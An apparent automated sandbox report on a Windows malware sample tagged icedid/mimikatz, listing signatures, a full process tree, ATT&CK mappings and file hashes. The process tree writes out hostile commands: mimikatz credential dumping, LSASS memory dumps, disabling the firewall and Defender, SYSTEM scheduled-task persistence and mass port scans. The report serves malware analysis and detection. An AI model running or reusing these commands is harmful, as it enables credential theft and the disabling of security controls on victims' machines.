Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
20-09-2024 07:53
General
-
Target
2024-09-20_9961903596039ea323b86ef94a503d37_hacktools_icedid_mimikatz.exe
-
Size
8.4MB
-
MD5
9961903596039ea323b86ef94a503d37
-
SHA1
57f49aa2fbb508f6b0fa88154c63f36f99b5aeee
-
SHA256
34edb189c9c7d524b4b3cd5ee69f6b034c2468988e4bc1d4549b205dfbac2bed
-
SHA512
8e3ff3213a5725c531d6c4494b86b528a9498fffe27e157ec0d75b5440fab663393a5a1825df1858c9d216ad1dd8ef615cb90385df80989b04a2298a9ef58f77
-
SSDEEP
196608:OxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:u5jz0E51/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (17474) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 3 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 28 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 35 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 45 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of SetWindowsHookEx 10 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\niuaeryvy\nbrbkn.exe"C:\Windows\TEMP\niuaeryvy\nbrbkn.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-09-20_9961903596039ea323b86ef94a503d37_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-09-20_9961903596039ea323b86ef94a503d37_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tlmnbsfy\dbtfmbf.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\tlmnbsfy\dbtfmbf.exeC:\Windows\tlmnbsfy\dbtfmbf.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\tlmnbsfy\dbtfmbf.exeC:\Windows\tlmnbsfy\dbtfmbf.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\intetbmbl\eatelrffa\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\intetbmbl\eatelrffa\wpcap.exeC:\Windows\intetbmbl\eatelrffa\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\intetbmbl\eatelrffa\blzntuqfb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\intetbmbl\eatelrffa\Scant.txt2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\intetbmbl\eatelrffa\blzntuqfb.exeC:\Windows\intetbmbl\eatelrffa\blzntuqfb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\intetbmbl\eatelrffa\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\intetbmbl\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\intetbmbl\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\intetbmbl\Corporate\vfshost.exeC:\Windows\intetbmbl\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "vzkmliviy" /ru system /tr "cmd /c C:\Windows\ime\dbtfmbf.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "vzkmliviy" /ru system /tr "cmd /c C:\Windows\ime\dbtfmbf.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "iltfyenfl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tlmnbsfy\dbtfmbf.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "iltfyenfl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tlmnbsfy\dbtfmbf.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ytiikbqeb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\niuaeryvy\nbrbkn.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ytiikbqeb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\niuaeryvy\nbrbkn.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 768 C:\Windows\TEMP\intetbmbl\768.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 316 C:\Windows\TEMP\intetbmbl\316.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 2156 C:\Windows\TEMP\intetbmbl\2156.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 2488 C:\Windows\TEMP\intetbmbl\2488.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 2652 C:\Windows\TEMP\intetbmbl\2652.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 2796 C:\Windows\TEMP\intetbmbl\2796.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 2964 C:\Windows\TEMP\intetbmbl\2964.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 3804 C:\Windows\TEMP\intetbmbl\3804.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 3892 C:\Windows\TEMP\intetbmbl\3892.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 3956 C:\Windows\TEMP\intetbmbl\3956.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 4032 C:\Windows\TEMP\intetbmbl\4032.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 4452 C:\Windows\TEMP\intetbmbl\4452.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 4128 C:\Windows\TEMP\intetbmbl\4128.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 4428 C:\Windows\TEMP\intetbmbl\4428.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 1496 C:\Windows\TEMP\intetbmbl\1496.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 3488 C:\Windows\TEMP\intetbmbl\3488.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 432 C:\Windows\TEMP\intetbmbl\432.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\intetbmbl\nasqttiif.exeC:\Windows\TEMP\intetbmbl\nasqttiif.exe -accepteula -mp 2500 C:\Windows\TEMP\intetbmbl\2500.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\intetbmbl\eatelrffa\scan.bat2⤵
-
C:\Windows\intetbmbl\eatelrffa\nanuystbn.exenanuystbn.exe TCP 194.110.0.1 194.110.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\ewqksq.exeC:\Windows\SysWOW64\ewqksq.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\dbtfmbf.exe1⤵
-
C:\Windows\ime\dbtfmbf.exeC:\Windows\ime\dbtfmbf.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tlmnbsfy\dbtfmbf.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\tlmnbsfy\dbtfmbf.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\niuaeryvy\nbrbkn.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\niuaeryvy\nbrbkn.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
2.8MB
MD57065ca706783566caab25ab38e0f1d70
SHA125d9ba7f37181a88162c73460f1a5dbd34c76a45
SHA256c94e875ff3269c5f44903129f381a05f775e2502a61f45a5ec7228931551f5c6
SHA5126699b94033b136db0a8d9e82f5aec40c84b356e3b9467a9359e724d77c8ad70732fe36a57764381ef1adcb9b8a78a409e78adbe69681929a6ad47eb09e3dfb7a
-
Filesize
4.1MB
MD5a233ecec8cef1f7f6e9c6cf0e2fe3eb2
SHA17bbf81d57de54dc247d9c70cca6ba5ff109972e8
SHA256af5a36716ea9eca583a3854af1cf7c9a0188bf5133c97827d985f47ef7decec4
SHA5128f4222b2342aba50a2fbb26695e6549a5a12b29e15b6420f1027dccbd2f00aa77d71dfc503b7bf5b184c53b706f2b6ac24fc9977868b2e4cb64e1c18102574d9
-
Filesize
3.6MB
MD50b54a0c035e7695af8097c9cac9ff7f8
SHA1751d287550694c4c300ee4f47fbe8160355bd425
SHA25691895e253734b343de8d45d3579aa34740bbc400f2e6ca01d1abbdd354aa97b7
SHA512f35725cb99f8ae66f78c38864a2d923d1da4f97fc3aba6781742f85900bba85d8f317ccdf7f649c612ce549f0d243b3d6403b366e02c35eeb6a7013c09b6c51f
-
Filesize
2.9MB
MD53a99a73841816fcd64fbe06e25eb368c
SHA1039aef67435c08a07adecbd246ae6fef6bf148d1
SHA256bb4e7e41698785dc9cb2bc4165bf06bf482252a088bd8b94f264e52faf0ed5ef
SHA512e3a3d61f0fc3860e62bbcd700b5030103de4787f6bdd8789ccb3888ad9451bd210b8fd3d6ec8338e364e3573492d1c6d7e10f034019788fbed262c87dc1a65bf
-
Filesize
7.6MB
MD5ab3a455d3a465f3ccefb6ba1eafc7be5
SHA193eb3bc16df8142829f8879f51efdd2011dcaedf
SHA2561bcaaa9b803fdd531600668329c980bd145316f586c75ba42749f59ab738290f
SHA512054390f5e1af97e008d765b5fe303c79c472787360b8b6d2bb7e9806d83bc101a8a69e11447c5a01a1006caeaebce4356bd88101d95f8c2b404c8313007d7c28
-
Filesize
778KB
MD59ecdeaa60850d92c4cf1b469ffbcaad1
SHA1ba1406a5ef670e14e4cf537351dcc05a3165f89b
SHA256ab002db78d7d58746e4819ac4dec41d3fd080651de4cdacbf9c87a1d03ccb349
SHA512cf52412135d3c5b15630848a5e6ba52de627bbb1cf374026d40cc74b691416d60fb969d02deae7cb188d5aa4403102a8fec4744e85fb50fd9ed0851deee6b138
-
Filesize
33.4MB
MD557f2be30e7dad054bc699ca28492d7a2
SHA11dd4d97f4fe4308196229b9963f4d869902f5993
SHA2560f6a9d81b09a6ea844c593cdbcb945ba6ad4271800b782c03c1e2037332fdf00
SHA51245137f6b8a5d12f5b24ea2f7fd78af513cf5012b3b4205df7495a0afa56796e6d058c74bedf085439a95d2bb9c6ff02217166162155bebadd9abd7b8d83eff3c
-
Filesize
2.7MB
MD5cc9083c527a927d8cbe90c6a15f168ea
SHA134331f606d05767f8dff2e2d8c2689715b0c4c1b
SHA256ec776f6dd36b13bdd9c21ec8ddc0951a7f0df496f04e4a61910aca44da6b9a75
SHA512f30a39b4866333ad5771e19f399785719e73a9fdd743adf6f154b19c260f0741489214616f34d94a80b01dfa647a8095b69be00372f8782124c05fc4d6d7d5b5
-
Filesize
20.6MB
MD5232baf9736f4a90b46050bdde6c9f6da
SHA1fd9ae32a8241b49ac2a0558dbb26bab1ec86a3cf
SHA2565819d94036f6b93edc03a799c7782d94ab4e7d12a9f1929480faec295136fb01
